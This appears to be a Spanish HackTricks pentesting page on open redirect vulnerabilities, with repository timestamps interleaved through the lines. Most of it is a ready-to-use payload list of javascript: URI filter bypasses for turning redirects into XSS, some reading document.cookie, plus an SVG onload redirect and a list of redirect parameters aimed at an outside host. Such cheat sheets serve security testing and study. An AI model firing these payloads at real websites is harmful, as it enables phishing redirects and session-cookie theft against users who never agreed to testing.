2024-05-14 11:14:48 +00:00
# Redirección Abierta
2023-06-05 18:33:24 +00:00
< details >
2024-05-14 11:14:48 +00:00
< summary > < strong > Aprende hacking en AWS de cero a héroe con< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (Experto en Red Team de AWS de HackTricks)< / strong > < / a > < strong > !< / strong > < / summary >
2023-06-05 18:33:24 +00:00
2024-02-06 04:06:30 +00:00
Otras formas de apoyar a HackTricks:
2023-06-05 18:33:24 +00:00
2024-02-09 08:10:19 +00:00
* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN** ](https://github.com/sponsors/carlospolop )!
2024-05-14 11:14:48 +00:00
* Obtén el [**swag oficial de PEASS & HackTricks** ](https://peass.creator-spring.com )
2024-02-09 08:10:19 +00:00
* Descubre [**La Familia PEASS** ](https://opensea.io/collection/the-peass-family ), nuestra colección exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-05-14 11:14:48 +00:00
* **Únete al** 💬 [**grupo de Discord** ](https://discord.gg/hRep4RUj7f ) o al [**grupo de telegram** ](https://t.me/peass ) o **síguenos** en **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-02-06 04:06:30 +00:00
* **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) y [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repositorios de github.
2023-06-05 18:33:24 +00:00
< / details >
2024-05-14 11:14:48 +00:00
## Redirección abierta
2023-06-05 18:33:24 +00:00
2024-05-14 11:14:48 +00:00
### Redirección a localhost o dominios arbitrarios
2023-06-05 18:33:24 +00:00
{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md ](ssrf-server-side-request-forgery/url-format-bypass.md )
{% endcontent-ref %}
2024-05-14 11:14:48 +00:00
### Redirección Abierta a XSS
2023-06-05 18:33:24 +00:00
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)
#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)
2024-05-14 11:14:48 +00:00
# Abuse bad subdomain filter
javascript://sub.domain.com/%0Aalert(1)
2023-06-05 18:33:24 +00:00
#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)
#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0
#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
< >javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
2024-05-14 11:14:48 +00:00
## Redirección abierta al cargar archivos svg
2023-06-05 18:33:24 +00:00
```markup
< code >
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
< svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
< / svg >
< / code >
```
2024-05-14 11:14:48 +00:00
## Parámetros comunes de inyección
2023-06-05 18:33:24 +00:00
```
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1 .github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
2024-05-14 11:14:48 +00:00
## Ejemplos de código
2023-06-05 18:33:24 +00:00
2024-05-14 11:14:48 +00:00
#### .Net
2023-06-05 18:33:24 +00:00
```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```
2024-05-14 11:14:48 +00:00
#### Java
2023-06-05 18:33:24 +00:00
```bash
response.redirect("http://mysafedomain.com");
```
2024-05-14 11:14:48 +00:00
#### PHP
2023-06-05 18:33:24 +00:00
```php
< ?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>
```
2024-05-14 11:14:48 +00:00
## Herramientas
2023-06-05 18:33:24 +00:00
* [https://github.com/0xNanda/Oralyzer ](https://github.com/0xNanda/Oralyzer )
2024-05-14 11:14:48 +00:00
## Recursos
2023-06-05 18:33:24 +00:00
2024-05-14 11:14:48 +00:00
* En [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect ) puedes encontrar listas de fuzzing.\\
* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html ](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html )\\
2024-02-06 04:06:30 +00:00
* [https://github.com/cujanovic/Open-Redirect-Payloads ](https://github.com/cujanovic/Open-Redirect-Payloads )
* [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a ](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a )
2023-06-05 18:33:24 +00:00
< details >
2024-02-06 04:06:30 +00:00
< summary > < strong > Aprende hacking en AWS de cero a héroe con< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2023-06-05 18:33:24 +00:00
2024-02-06 04:06:30 +00:00
Otras formas de apoyar a HackTricks:
2023-06-05 18:33:24 +00:00
2024-05-14 11:14:48 +00:00
* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** ¡Consulta los [**PLANES DE SUSCRIPCIÓN** ](https://github.com/sponsors/carlospolop )!
2024-02-06 04:06:30 +00:00
* Obtén el [**oficial PEASS & HackTricks swag** ](https://peass.creator-spring.com )
* Descubre [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), nuestra colección exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-05-14 11:14:48 +00:00
* **Únete al** 💬 [**grupo de Discord** ](https://discord.gg/hRep4RUj7f ) o al [**grupo de telegram** ](https://t.me/peass ) o **síguenos** en **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-02-06 04:06:30 +00:00
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) y [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2023-06-05 18:33:24 +00:00
< / details >